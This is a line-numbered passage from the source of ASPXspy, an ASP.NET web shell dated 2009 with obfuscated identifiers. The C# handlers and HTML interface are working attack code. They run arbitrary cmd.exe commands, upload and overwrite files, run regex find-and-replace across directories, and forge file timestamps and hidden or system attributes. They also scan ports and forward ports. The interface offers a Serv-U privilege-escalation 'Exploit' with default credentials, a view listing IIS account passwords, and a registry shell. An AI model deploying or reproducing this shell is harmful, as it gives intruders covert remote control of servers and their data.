  1815. PortForward gYP=new PortForward();
  1816. gYP.lyTOK();
  1817. }
  1818. protected void ruQO()
  1819. {
  1820. PortForward gYP=new PortForward();
  1821. gYP.Start(llH.Value,int.Parse(ZHS.Value),eEpm.Value,int.Parse(iXdh.Value));
  1822. }
  1823. public string mRDl(string instr)
  1824. {
  1825. string tmp=null;
  1826. try
  1827. {
  1828. tmp=System.Net.Dns.Resolve(instr).AddressList[0].ToString();
  1829. }
  1830. catch(Exception e)
  1831. {
  1832. }
  1833. return tmp;
  1834. }
  1835. public void VikG()
  1836. {
  1837. string[] OTV=lOmX.Text.ToString().Split(',');
  1838. for(int i=0;i<OTV.Length;i++)
  1839. {
  1840. IVc.Add(new ScanPort(mRDl(MdR.Text.ToString()),Int32.Parse(OTV[i])));
  1841. }
  1842. try
  1843. {
  1844. Thread[] kbXY=new Thread[IVc.Count];
  1845. int sdO=0;
  1846. for(sdO=0;sdO<IVc.Count;sdO++)
  1847. {
  1848. kbXY[sdO]=new Thread(new ThreadStart(((ScanPort)IVc[sdO]).Scan));
  1849. kbXY[sdO].Start();
  1850. }
  1851. for(sdO=0;sdO<kbXY.Length;sdO++)
  1852. kbXY[sdO].Join();
  1853. }
  1854. catch
  1855. {
  1856. }
  1857. }
  1858. public class ScanPort
  1859. {
  1860. private string _ip="";
  1861. private int jTdO=0;
  1862. private TimeSpan _timeSpent;
  1863. private string QGcH="Not scanned";
  1864. public string ip
  1865. {
  1866. get { return _ip;}
  1867. }
  1868. public int port
  1869. {
  1870. get { return jTdO;}
  1871. }
  1872. public string status
  1873. {
  1874. get { return QGcH;}
  1875. }
  1876. public TimeSpan timeSpent
  1877. {
  1878. get { return _timeSpent;}
  1879. }
  1880. public ScanPort(string ip,int port)
  1881. {
  1882. _ip=ip;
  1883. jTdO=port;
  1884. }
  1885. public void Scan()
  1886. {
  1887. TcpClient iYap=new TcpClient();
  1888. DateTime qYZT=DateTime.Now;
  1889. try
  1890. {
  1891. iYap.Connect(_ip,jTdO);
  1892. iYap.Close();
  1893. QGcH="<font color=green><b>Open</b></font>";
  1894. }
  1895. catch
  1896. {
  1897. QGcH="<font color=red><b>Close</b></font>";
  1898. }
  1899. _timeSpent=DateTime.Now.Subtract(qYZT);
  1900. }
  1901. }
  1902. public static void YFcNP(System.Web.UI.Page page)
  1903. {
  1904. page.RegisterHiddenField("__EVENTTARGET","");
  1905. page.RegisterHiddenField("__FILE","");
  1906. string s=@"<script language=Javascript>";
  1907. s+=@"function Bin_PostBack(eventTarget,eventArgument)";
  1908. s+=@"{";
  1909. s+=@"var theform=document.forms[0];";
  1910. s+=@"theform.__EVENTTARGET.value=eventTarget;";
  1911. s+=@"theform.__FILE.value=eventArgument;";
  1912. s+=@"theform.submit();";
  1913. s+=@"} ";
  1914. s+=@"</scr"+"ipt>";
  1915. page.RegisterStartupScript("",s);
  1916. }
  1917. protected void PPtK(object sender,EventArgs e)
  1918. {
  1919. WICxe();
  1920. yhv.Visible=true;
  1921. Bin_H2_Title.InnerText="File Search >>";
  1922. NaLJ.Value=Request.PhysicalApplicationPath;
  1923. oJiym.Visible=false;
  1924. }
  1925. protected void NBy(object sender,EventArgs e)
  1926. {
  1927. DirectoryInfo GQMM=new DirectoryInfo(NaLJ.Value);
  1928. if(!GQMM.Exists)
  1929. {
  1930. xseuB("Path invalid ! ");
  1931. return;
  1932. }
  1933. oog(GQMM);
  1934. xseuB("Search completed ! ");
  1935. }
  1936. public void oog(DirectoryInfo dir)
  1937. {
  1938. try
  1939. {
  1940. oJiym.Visible=true;
  1941. foreach(FileInfo Bin_Files in dir.GetFiles())
  1942. {
  1943. try
  1944. {
  1945. if(Bin_Files.FullName==Request.PhysicalPath)
  1946. {
  1947. continue;
  1948. }
  1949. if(!Regex.IsMatch(Bin_Files.Extension.Replace(".",""),"^("+UDLvA.Value+")$",RegexOptions.IgnoreCase))
  1950. {
  1951. continue;
  1952. }
  1953. if(Ven.SelectedItem.Value=="name")
  1954. {
  1955. if(rAQ.Checked)
  1956. {
  1957. if(Regex.IsMatch(Bin_Files.Name,iaMKl.Value,RegexOptions.IgnoreCase))
  1958. {
  1959. FJvQ(Bin_Files);
  1960. }
  1961. }
  1962. else
  1963. {
  1964. if(Bin_Files.Name.ToLower().IndexOf(iaMKl.Value.ToLower())!=-1)
  1965. {
  1966. Response.Write(Bin_Files.FullName);
  1967. FJvQ(Bin_Files);
  1968. }
  1969. }
  1970. }
  1971. else
  1972. {
  1973. StreamReader sr=new StreamReader(Bin_Files.FullName,Encoding.Default);
  1974. string ava=sr.ReadToEnd();
  1975. sr.Close();
  1976. if(rAQ.Checked)
  1977. {
  1978. if(Regex.IsMatch(ava,iaMKl.Value,RegexOptions.IgnoreCase))
  1979. {
  1980. FJvQ(Bin_Files);
  1981. if(YZw.Checked)
  1982. {
  1983. ava=Regex.Replace(ava,iaMKl.Value,qPe.Value,RegexOptions.IgnoreCase);
  1984. StreamWriter sw=new StreamWriter(Bin_Files.FullName,false,Encoding.Default);
  1985. sw.Write(ava);
  1986. sw.Close();
  1987. }
  1988. }
  1989. }
  1990. else
  1991. {
  1992. if(ava.ToLower().IndexOf(iaMKl.Value.ToLower())!=-1)
  1993. {
  1994. FJvQ(Bin_Files);
  1995. if(YZw.Checked)
  1996. {
  1997. ava=Strings.Replace(ava,iaMKl.Value,qPe.Value,1,-1,CompareMethod.Text);
  1998. StreamWriter sw=new StreamWriter(Bin_Files.FullName,false,Encoding.Default);
  1999. sw.Write(ava);
  2000. sw.Close();
  2001. }
  2002. }
  2003. }
  2004. }
  2005. }
  2006. catch(Exception ex)
  2007. {
  2008. xseuB(ex.Message);
  2009. continue;
  2010. }
  2011. }
  2012. foreach(DirectoryInfo subdir in dir.GetDirectories())
  2013. {
  2014. oog(subdir);
  2015. }
  2016. }
  2017. catch(Exception ex)
  2018. {
  2019. xseuB(ex.Message);
  2020. }
  2021. }
  2022. public void FJvQ(FileInfo objfile)
  2023. {
  2024. TableRow tr=new TableRow();
  2025. TableCell tc=new TableCell();
  2026. string bg=OKM();
  2027. tr.Attributes["onmouseover"]="this.className='focus';";
  2028. tr.CssClass=bg;
  2029. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
  2030. tc.Text="<a href=\"javascript:Bin_PostBack('Bin_Listdir','"+MVVJ(objfile.DirectoryName)+"')\">"+objfile.FullName+"</a>";
  2031. tr.Cells.Add(tc);
  2032. tc=new TableCell();
  2033. tc.Text=objfile.LastWriteTime.ToString();
  2034. tr.Cells.Add(tc);
  2035. tc=new TableCell();
  2036. tc.Text=mTG(objfile.Length);
  2037. tr.Cells.Add(tc);
  2038. oJiym.Rows.Add(tr);
  2039. }
  2040. public void xseuB(string instr)
  2041. {
  2042. jDKt.Visible=true;
  2043. jDKt.InnerText=instr;
  2044. }
  2045. protected void xVm(object sender,EventArgs e)
  2046. {
  2047. string Jfm=FormsAuthentication.HashPasswordForStoringInConfigFile(HRJ.Text,"MD5").ToLower();
  2048. if(Jfm==Password)
  2049. {
  2050. Response.Cookies.Add(new HttpCookie(vbhLn,Password));
  2051. ljtzC.Visible=false;
  2052. PBZw();
  2053. }
  2054. else
  2055. {
  2056. tZSx();
  2057. }
  2058. }
  2059. protected void Ybg(object sender,EventArgs e)
  2060. {
  2061. krIR(Server.MapPath("."));
  2062. }
  2063. protected void KjPi(object sender,EventArgs e)
  2064. {
  2065. Bin_H2_Title.InnerText="IIS Spy >>";
  2066. WICxe();
  2067. VNR.Visible=true;
  2068. AdCx();
  2069. }
  2070. protected void DGCoW(object sender,EventArgs e)
  2071. {
  2072. try
  2073. {
  2074. StreamWriter sw;
  2075. if(NdCX.SelectedItem.Text=="UTF-8")
  2076. {
  2077. sw=new StreamWriter(Sqon.Value,false,Encoding.UTF8);
  2078. }
  2079. else
  2080. {
  2081. sw=new StreamWriter(Sqon.Value,false,Encoding.Default);
  2082. }
  2083. sw.Write(Xgvv.InnerText);
  2084. sw.Close();
  2085. xseuB("Save file success !");
  2086. }
  2087. catch(Exception error)
  2088. {
  2089. xseuB(error.Message);
  2090. }
  2091. krIR(AXSbb.Value);
  2092. }
  2093. protected void lbjLD(object sender,EventArgs e)
  2094. {
  2095. string FlwA=AXSbb.Value;
  2096. FlwA=OElM(FlwA);
  2097. try
  2098. {
  2099. Fhq.PostedFile.SaveAs(FlwA+Path.GetFileName(Fhq.Value));
  2100. xseuB("File upload success!");
  2101. }
  2102. catch(Exception error)
  2103. {
  2104. xseuB(error.Message);
  2105. }
  2106. krIR(AXSbb.Value);
  2107. }
  2108. protected void EXV(object sender,EventArgs e)
  2109. {
  2110. krIR(AXSbb.Value);
  2111. }
  2112. protected void mcCY(object sender,EventArgs e)
  2113. {
  2114. krIR(Server.MapPath("."));
  2115. }
  2116. protected void iVk(object sender,CommandEventArgs e)
  2117. {
  2118. krIR(e.CommandArgument.ToString());
  2119. }
  2120. protected void XXrLw(object sender,EventArgs e)
  2121. {
  2122. try
  2123. {
  2124. File.SetCreationTimeUtc(QiFB.Value,File.GetCreationTimeUtc(lICp.Value));
  2125. File.SetLastAccessTimeUtc(QiFB.Value,File.GetLastAccessTimeUtc(lICp.Value));
  2126. File.SetLastWriteTimeUtc(QiFB.Value,File.GetLastWriteTimeUtc(lICp.Value));
  2127. xseuB("File time clone success!");
  2128. }
  2129. catch(Exception error)
  2130. {
  2131. xseuB(error.Message);
  2132. }
  2133. krIR(AXSbb.Value);
  2134. }
  2135. protected void tIykC(object sender,EventArgs e)
  2136. {
  2137. string path=pWVL.Value;
  2138. try
  2139. {
  2140. File.SetAttributes(path,FileAttributes.Normal);
  2141. if(ZhWSK.Checked)
  2142. {
  2143. File.SetAttributes(path,FileAttributes.ReadOnly);
  2144. }
  2145. if(SsR.Checked)
  2146. {
  2147. File.SetAttributes(path,File.GetAttributes(path)| FileAttributes.System);
  2148. }
  2149. if(ccB.Checked)
  2150. {
  2151. File.SetAttributes(path,File.GetAttributes(path)| FileAttributes.Hidden);
  2152. }
  2153. if(fbyZ.Checked)
  2154. {
  2155. File.SetAttributes(path,File.GetAttributes(path)| FileAttributes.Archive);
  2156. }
  2157. File.SetCreationTimeUtc(path,Convert.ToDateTime(yUqx.Value));
  2158. File.SetLastAccessTimeUtc(path,Convert.ToDateTime(aLsn.Value));
  2159. File.SetLastWriteTimeUtc(path,Convert.ToDateTime(uYjw.Value));
  2160. xseuB("File attributes modify success!");
  2161. }
  2162. catch(Exception error)
  2163. {
  2164. xseuB(error.Message);
  2165. }
  2166. krIR(AXSbb.Value);
  2167. }
  2168. protected void VOxn(object sender,EventArgs e)
  2169. {
  2170. WICxe();
  2171. vIac.Visible=true;
  2172. Bin_H2_Title.InnerText="Execute Command >>";
  2173. }
  2174. protected void FbhN(object sender,EventArgs e)
  2175. {
  2176. try
  2177. {
  2178. Process ahAE=new Process();
  2179. ahAE.StartInfo.FileName=kusi.Value;
  2180. ahAE.StartInfo.Arguments=bkcm.Value;
  2181. ahAE.StartInfo.UseShellExecute=false;
  2182. ahAE.StartInfo.RedirectStandardInput=true;
  2183. ahAE.StartInfo.RedirectStandardOutput=true;
  2184. ahAE.StartInfo.RedirectStandardError=true;
  2185. ahAE.Start();
  2186. string Uoc=ahAE.StandardOutput.ReadToEnd();
  2187. Uoc=Uoc.Replace("<","&lt;");
  2188. Uoc=Uoc.Replace(">","&gt;");
  2189. Uoc=Uoc.Replace("\r\n","<br>");
  2190. tnQRF.Visible=true;
  2191. tnQRF.InnerHtml="<hr width=\"100%\" noshade/><pre>"+Uoc+"</pre>";
  2192. }
  2193. catch(Exception error)
  2194. {
  2195. xseuB(error.Message);
  2196. }
  2197. }
  2198. protected void RAFL(object sender,EventArgs e)
  2199. {
  2200. if(qPdI.Text.Length>0)
  2201. {
  2202. tpRQ(qPdI.Text);
  2203. }
  2204. else
  2205. {
  2206. lFAvw();
  2207. }
  2208. }
  2209. protected void Grxk(object sender,EventArgs e)
  2210. {
  2211. YUw();
  2212. }
  2213. protected void ilC(object sender,EventArgs e)
  2214. {
  2215. tZRH();
  2216. }
  2217. protected void HtB(object sender,EventArgs e)
  2218. {
  2219. pDVM();
  2220. }
  2221. protected void Olm(object sender,EventArgs e)
  2222. {
  2223. iLVUT();
  2224. }
  2225. protected void jXhS(object sender,EventArgs e)
  2226. {
  2227. ADCpk();
  2228. }
  2229. protected void lRfRj(object sender,EventArgs e)
  2230. {
  2231. lDODR();
  2232. }
  2233. protected void xSy(object sender,EventArgs e)
  2234. {
  2235. xFhz();
  2236. }
  2237. protected void dMx(object sender,EventArgs e)
  2238. {
  2239. rAhe();
  2240. }
  2241. protected void zOVO(object sender,EventArgs e)
  2242. {
  2243. if(((DropDownList)sender).ID.ToString()=="WYmo")
  2244. {
  2245. dQIIF.Visible=false;
  2246. MasR.Text=WYmo.SelectedItem.Value.ToString();
  2247. }
  2248. if(((DropDownList)sender).ID.ToString()=="Pvf")
  2249. {
  2250. xTZY();
  2251. }
  2252. if(((DropDownList)sender).ID.ToString()=="FGEy")
  2253. {
  2254. jHIy.InnerText=FGEy.SelectedItem.Value.ToString();
  2255. }
  2256. if(((DropDownList)sender).ID.ToString()=="NdCX")
  2257. {
  2258. gLKc(Sqon.Value);
  2259. }
  2260. }
  2261. protected void IkkO(object sender,EventArgs e)
  2262. {
  2263. krIR(AXSbb.Value);
  2264. }
  2265. protected void BGY(object sender,EventArgs e)
  2266. {
  2267. vCf();
  2268. }
  2269. protected void cptS(object sender,EventArgs e)
  2270. {
  2271. vNCHZ();
  2272. }
  2273. protected void fDO(object sender,EventArgs e)
  2274. {
  2275. MHLv();
  2276. }
  2277. protected void vJNsE(object sender,EventArgs e)
  2278. {
  2279. vuou();
  2280. xseuB("Clear All Thread ......");
  2281. }
  2282. protected void wDZ(object sender,EventArgs e)
  2283. {
  2284. if(iXdh.Value=="" || eEpm.Value.Length<7 || ZHS.Value=="")return;
  2285. ruQO();
  2286. xseuB("All Thread Start ......");
  2287. }
  2288. protected void tYoZ(object sender,EventArgs e)
  2289. {
  2290. }
  2291. protected void ELkQ(object sender,EventArgs e)
  2292. {
  2293. VikG();
  2294. GBYT.Visible=true;
  2295. string res=string.Empty;
  2296. foreach(ScanPort th in IVc)
  2297. {
  2298. res+=th.ip+" : "+th.port+" ................................. "+th.status+"<br>";
  2299. }
  2300. GBYT.InnerHtml=res;
  2301. }
  2302. protected void ORUgV(object sender,EventArgs e)
  2303. {
  2304. dwgT();
  2305. }
  2306. public void WICxe()
  2307. {
  2308. DCbS.Visible=false;
  2309. CzfO.Visible=false;
  2310. APl.Visible=false;
  2311. vIac.Visible=false;
  2312. kkHN.Visible=false;
  2313. YwLB.Visible=false;
  2314. iDgmL.Visible=false;
  2315. hOWTm.Visible=false;
  2316. vrFA.Visible=false;
  2317. yhv.Visible=false;
  2318. }
  2319. </script>
  2320. <html xmlns="http://www.w3.org/1999/xhtml" >
  2321. <head id="Head1" runat="server">
  2322. <meta http-equiv="Content-Type" content="text/html;charset=utf-8"/>
  2323. <title>ASPXspy</title>
  2324. <style type="text/css">
  2325. .Bin_Style_Login{font:11px Verdana;BACKGROUND: #FFFFFF;border: 1px solid #666666;}
  2326. body,td{font: 12px Arial,Tahoma;line-height: 16px;}
  2327. .input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:16px;}
  2328. .list{font:12px Arial,Tahoma;height:23px;}
  2329. .area{font:12px 'Courier New',Monospace;background:#fff;border: 1px solid #666;padding:2px;}
  2330. .bt {border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;}
  2331. a {color: #00f;text-decoration:underline;}
  2332. a:hover{color: #f00;text-decoration:none;}
  2333. .alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ededed;padding:5px 10px 5px 5px;}
  2334. .alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#fafafa;padding:5px 10px 5px 5px;}
  2335. .focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 10px 5px 5px;}
  2336. .head td{border-top:1px solid #ddd;border-bottom:1px solid #ccc;background:#e8e8e8;padding:5px 10px 5px 5px;font-weight:bold;}
  2337. .head td span{font-weight:normal;}
  2338. form{margin:0;padding:0;}
  2339. h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
  2340. ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
  2341. u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
  2342. .u1{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
  2343. .u2{text-decoration: none;color:#777;float:left;display:block;width:350px;margin-right:10px;}
  2344. </style>
  2345. <script type="text/javascript">
  2346. function CheckAll(form){
  2347. for(var i=0;i<form.elements.length;i++){
  2348. var e=form.elements[i];
  2349. if(e.name!='chkall')
  2350. e.checked=form.chkall.checked;
  2351. }
  2352. }
  2353. </script>
  2354. </head>
  2355. <body style="margin:0;table-layout:fixed;">
  2356. <form id="ASPXSpy" runat="server">
  2357. <div id="ljtzC" runat="server" style=" margin:15px" enableviewstate="false" visible="false" >
  2358. <span style="font:11px Verdana;">Password:</span>
  2359. <asp:TextBox ID="HRJ" runat="server" Columns="20" CssClass="Bin_Style_Login" ></asp:TextBox>
  2360. <asp:Button ID="ZSnXu" runat="server" Text="Login" CssClass="Bin_Style_Login" OnClick="xVm"/><p/>
  2361. Copyright &copy; 2009 Bin -- <a href="http://www.rootkit.net.cn" target="_blank">www.rootkit.net.cn</a>
  2362. </div>
  2363. <div id="ZVS" runat="server">
  2364. <div id="Zzj" runat="server">
  2365. <table width="100%" border="0" cellpadding="0" cellspacing="0">
  2366. <tr class="head">
  2367. <td ><span style="float:right;"><a href="http://www.rootkit.net.cn" target="_blank">ASPXSpy Ver: 2009</a></span><span id="Bin_Span_Sname" runat="server" enableviewstate="true"></span></td>
  2368. </tr>
  2369. <tr class="alt1">
  2370. <td><span style="float:right;" id="Bin_Span_FrameVersion" runat="server"></span>
  2371. <asp:LinkButton ID="UtkN" runat="server" OnClick="YKpI" Text="Logout" ></asp:LinkButton> | <asp:LinkButton ID="RsqhW" runat="server" Text="File Manager" OnClick="Ybg"></asp:LinkButton> | <asp:LinkButton ID="xxzE" runat="server" Text="CmdShell" OnClick="VOxn"></asp:LinkButton> | <asp:LinkButton ID="nuc" runat="server" Text="IIS Spy" OnClick="KjPi"></asp:LinkButton> | <asp:LinkButton ID="OREpx" runat="server" Text="Process" OnClick="Grxk"></asp:LinkButton> | <asp:LinkButton ID="jHN" runat="server" Text="Services" OnClick="ilC"></asp:LinkButton> | <asp:LinkButton ID="PHq" runat="server" Text="UserInfo" OnClick="Olm"></asp:LinkButton> | <asp:LinkButton ID="wmgnK" runat="server" Text="SysInfo" OnClick="HtB"></asp:LinkButton> | <asp:LinkButton ID="FeV" runat="server" Text="FileSearch" OnClick="PPtK"></asp:LinkButton> | <asp:LinkButton ID="PVQ" runat="server" Text="SU Exp" OnClick="jXhS"></asp:LinkButton> | <asp:LinkButton ID="jNDb" runat="server" Text="RegShell" OnClick="xSy"></asp:LinkButton> | <asp:LinkButton ID="HDQ" runat="server" Text="PortScan" OnClick="cptS" ></asp:LinkButton> | <asp:LinkButton ID="AoI" runat="server" Text="DataBase" OnClick="dMx"></asp:LinkButton> | <asp:LinkButton ID="KHbEd" runat="server" Text="PortMap" OnClick="fDO"></asp:LinkButton>
  2372. </td>
  2373. </tr>
  2374. </table>
  2375. </div>
  2376. <table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
  2377. <div id="jDKt" style="background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:center;font-weight:bold;" runat="server" visible="false" enableviewstate="false"></div>
  2378. <h2 id="Bin_H2_Title" runat="server"></h2>
  2379. <%--FileList--%>
  2380. <div id="CzfO" runat="server">
  2381. <table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
  2382.  <tr>
  2383. <td style=" white-space:nowrap">Current Directory : </td>
  2384. <td style=" width:100%"><input class="input" id="AXSbb" type="text" style="width:97%;margin:0 8px;" runat="server"/>
  2385. </td>
  2386. <td style="white-space:nowrap" ><asp:Button ID="xaGwl" runat="server" Text="Go" CssClass="bt" OnClick="EXV"/></td>
  2387.  </tr>
  2388. </table>
  2389. <table width="100%" border="0" cellpadding="4" cellspacing="0">
  2390. <tr class="alt1"><td colspan="7" style="padding:5px;">
  2391. <div style="float:right;"><input id="Fhq" class="input" runat="server" type="file" style=" height:22px"/>
  2392. <asp:Button ID="RvPp" CssClass="bt" runat="server" Text="Upload" OnClick="lbjLD"/></div><asp:LinkButton ID="OLJFp" runat="server" Text="WebRoot" OnClick="mcCY"></asp:LinkButton> | <a href="#" id="Bin_Button_CreateDir" runat="server">Create Directory</a> | <a href="#" id="Bin_Button_CreateFile" runat="server">Create File</a>
  2393.  | <span id="Bin_Span_Drv" runat="server"></span><a href="#" id="Bin_Button_KillMe" runat="server" style="color:Red">Kill Me</a>
  2394. </td></tr>
  2395. <asp:Table ID="UGzP" runat="server" Width="100%" CellSpacing="0" >
  2396. <asp:TableRow CssClass="head"><asp:TableCell>&nbsp;</asp:TableCell><asp:TableCell>Filename</asp:TableCell><asp:TableCell Width="25%">Last modified</asp:TableCell><asp:TableCell Width="15%">Size</asp:TableCell><asp:TableCell Width="25%">Action</asp:TableCell></asp:TableRow>
  2397. </asp:Table>
  2398. </table>
  2399. </div>
  2400. <%--FileEdit--%>
  2401. <div id="vrFA" runat="server">
  2402. <p>Current File(import new file name and new file)<br/>
  2403. <input class="input" id="Sqon" type="text" size="100" runat="server"/> <asp:DropDownList ID="NdCX" runat="server" CssClass="list" AutoPostBack="true" OnSelectedIndexChanged="zOVO"><asp:ListItem>Default</asp:ListItem><asp:ListItem>UTF-8</asp:ListItem></asp:DropDownList>
  2404. </p>
  2405. <p>File Content<br/>
  2406. <textarea id="Xgvv" runat="server" class="area" cols="100" rows="25" enableviewstate="true" ></textarea>
  2407. </p>
  2408. <p><asp:Button ID="JJjbW" runat="server" Text="Submit" CssClass="bt" OnClick="DGCoW"/> <asp:Button ID="iCNu" runat="server" Text="Back" CssClass="bt" OnClick="IkkO"/></p>
  2409. </div>
  2410. <%--CloneTime--%>
  2411. <div id="zRyG" runat="server" enableviewstate="false" visible="false">
  2412. <p>Alter file<br/><input class="input" id="QiFB" type="text" size="120" runat="server"/></p>
  2413. <p>Reference file(fullpath)<br/><input class="input" id="lICp" type="text" size="120" runat="server"/></p>
  2414. <p><asp:Button ID="JEaxV" runat="server" Text="Submit" CssClass="bt" OnClick="XXrLw"/></p>
  2415. <h2>Set last modified &raquo;</h2>
  2416. <p>Current file(fullpath)<br/><input class="input" id="pWVL" type="text" size="120" runat="server"/></p>
  2417. <p>
  2418. <asp:CheckBox ID="ZhWSK" runat="server" Text="ReadOnly" EnableViewState="False"/>
  2419. &nbsp;
  2420. <asp:CheckBox ID="SsR" runat="server" Text="System" EnableViewState="False"/>
  2421. &nbsp;
  2422. <asp:CheckBox ID="ccB" runat="server" Text="Hidden" EnableViewState="False"/>
  2423. &nbsp;
  2424. <asp:CheckBox ID="fbyZ" runat="server" Text="Archive" EnableViewState="False"/>
  2425. </p>
  2426. <p>
  2427. CreationTime :
  2428. <input class="input" id="yUqx" type="text" runat="server"/>
  2429. LastWriteTime :
  2430. <input class="input" id="uYjw" type="text" runat="server"/>
  2431. LastAccessTime :
  2432. <input class="input" id="aLsn" type="text" runat="server"/>
  2433. </p>
  2434. <p>
  2435. <asp:Button ID="kOG" CssClass="bt" runat="server" Text="Submit" OnClick="tIykC"/>
  2436. </p>
  2437. </div>
  2438. <%--IISSpy--%>
  2439. <div runat="server" id="VNR" visible="false" enableviewstate="false">
  2440. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
  2441. <asp:Table ID="GlI" runat="server" Width="100%" CellSpacing="0">
  2442. <asp:TableRow CssClass="head"><asp:TableCell>ID</asp:TableCell><asp:TableCell>IIS_USER</asp:TableCell><asp:TableCell>IIS_PASS</asp:TableCell><asp:TableCell>Domain</asp:TableCell><asp:TableCell>Path</asp:TableCell></asp:TableRow>
  2443. </asp:Table>
  2444. </table>
  2445. </div>
  2446. <%--Process--%>
  2447. <div runat="server" id="DCbS" visible="false" enableviewstate="false">
  2448. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
  2449. <asp:Table ID="IjsL" runat="server" Width="100%" CellSpacing="0" >
  2450. <asp:TableRow CssClass="head"><asp:TableCell></asp:TableCell><asp:TableCell>ID</asp:TableCell><asp:TableCell>Process</asp:TableCell><asp:TableCell>ThreadCount</asp:TableCell><asp:TableCell>Priority</asp:TableCell><asp:TableCell>Action</asp:TableCell></asp:TableRow>
  2451. </asp:Table>
  2452. </table>
  2453. </div>
  2454. <%--CmdShell--%>
  2455. <div runat="server" id="vIac">
  2456.  <p>CmdPath:<br/>
  2457.  <input class="input" runat="server" id="kusi" type="text" size="100" value="c:\windows\system32\cmd.exe"/>
  2458.  </p>
  2459.  Argument:<br/>
  2460.  <input class="input" runat="server" id="bkcm" value="/c Set" type="text" size="100"/> <asp:Button ID="YrqL" CssClass="bt" runat="server" Text="Submit" OnClick="FbhN"/>
  2461.  <div id="tnQRF" runat="server" visible="false" enableviewstate="false">
  2462.  </div>
  2463. </div>
  2464. <%--Services--%>
  2465. <div runat="server" id="iQxm" visible ="false" enableviewstate="false">
  2466. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
  2467. <asp:Table ID="vHCs" runat="server" Width="100%" CellSpacing="0" >
  2468. <asp:TableRow CssClass="head"><asp:TableCell></asp:TableCell><asp:TableCell>ID</asp:TableCell><asp:TableCell>Name</asp:TableCell><asp:TableCell>Path</asp:TableCell><asp:TableCell>State</asp:TableCell><asp:TableCell>StartMode</asp:TableCell></asp:TableRow>
  2469. </asp:Table>
  2470. </table>
  2471. </div>
  2472. <%--Sysinfo--%>
  2473. <div runat="server" id="ghaB" visible="false" enableviewstate="false">
  2474. <hr style=" border: 1px solid #ddd;height:0px;"/>
  2475. <ul class="info" id="Bin_Ul_Sys" runat="server"></ul>
  2476. <h2 id="Bin_H2_Mac" runat="server"></h2>
  2477. <hr style=" border: 1px solid #ddd;height:0px;"/>
  2478. <ul class="info" id ="Bin_Ul_NetConfig" runat="server"></ul>
  2479. <h2 id="Bin_H2_Driver" runat="server"></h2>
  2480. <hr style=" border: 1px solid #ddd;height:0px;"/>
  2481. <ul class="info" id ="Bin_Ul_Driver" runat="server"></ul>
  2482. </div>
  2483. <%--UserInfo--%>
  2484. <div runat="server" id="xWVQ" visible="false" enableviewstate="false">
  2485. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
  2486. <asp:Table ID="VPa" runat="server" Width="100%" CellSpacing="0" >
  2487. </asp:Table>
  2488. </table>
  2489. </div>
  2490. <%--SuExp--%>
  2491.  <div runat="server" id="APl">
  2492. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
  2493.  <tr align="center">
  2494.  <td style="width:10%"></td>
  2495.  <td style="width:20%" align="left">UserName : <input class="input" runat="server" id="dNohJ" type="text" size="20" value="localadministrator"/></td>
  2496.  <td style="width:20%" align="left">PassWord : <input class="input" runat="server" id="NMd" type="text" size="20" value="#l@$ak#.lk;0@P"/></td>
  2497.  <td style="width:20%" align="left">Port : <input class="input" runat="server" id="HlQl" type="text" size="20" value="43958"/></td>
  2498.  <td style="width:10%"></td>
  2499.  </tr>
  2500.  <tr >
  2501.  <td style="width:10%"></td>
  2502.  <td colspan="5">CmdShell&nbsp;&nbsp;:&nbsp;<input class="input" runat="server" id="mHbjB" type="text" size="100" value="cmd.exe /c net user"/> <asp:Button ID="SPhc" CssClass="bt" runat="server" Text="Exploit" OnClick="lRfRj"/></td>
  2503.  </tr>
  2504. </table>
  2505. <div id="UHlA" visible="false" enableviewstate="false" runat="server">
  2506. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
  2507. <tr align="center">
  2508. <td style="width:30%"></td>
  2509. <td align="left" style="width:40%"><pre id="Bin_Td_Res" runat="server"></pre></td>
  2510. <td style="width:30%"></td>
  2511. </tr>
  2512. </table>
  2513. </div>
  2514. </div>
  2515. <%--Reg--%>
  2516. <div id="kkHN" runat="server">
  2517. <p>Registry Path : <asp:TextBox id="qPdI" style="width:85%;margin:0 8px;" CssClass="input" runat="server"/><asp:Button ID="MoNA" runat="server" Text="Go" CssClass="bt" onclick="RAFL"/></p>
  2518. <table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
  2519. <asp:Table ID="pLWD" runat="server" Width="100%" CellSpacing="0" >
  2520. <asp:TableRow CssClass="alt1"><asp:TableCell ColumnSpan="2" id="vyX"></asp:TableCell></asp:TableRow>
  2521. <asp:TableRow CssClass="head"><asp:TableCell Width="40%">Key</asp:TableCell><asp:TableCell Width="60%">Value</asp:TableCell></asp:TableRow>
  2522. </asp:Table>
  2523. </table>
  2524. </div>
  2525. <%--PortScan--%>
  2526. <div id="YwLB" runat="server">
  2527. <p>
  2528. IP : <asp:TextBox id="MdR" style="width:10%;margin:0 8px;" CssClass="input" runat="server" Text="127.0.0.1"/> Port : <asp:TextBox id="lOmX" style="width:40%;margin:0 8px;" CssClass="input" runat="server" Text="21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500"/> <asp:Button ID="CmUCh" runat="server" Text="Scan" CssClass="bt" OnClick="ELkQ"/>
  2529. </p>
  2530. <div id="GBYT" runat="server" visible="false" enableviewstate="false"></div>
  2531. </div>
  2532. <%--DataBase--%>
  2533. <div id="iDgmL" runat="server">
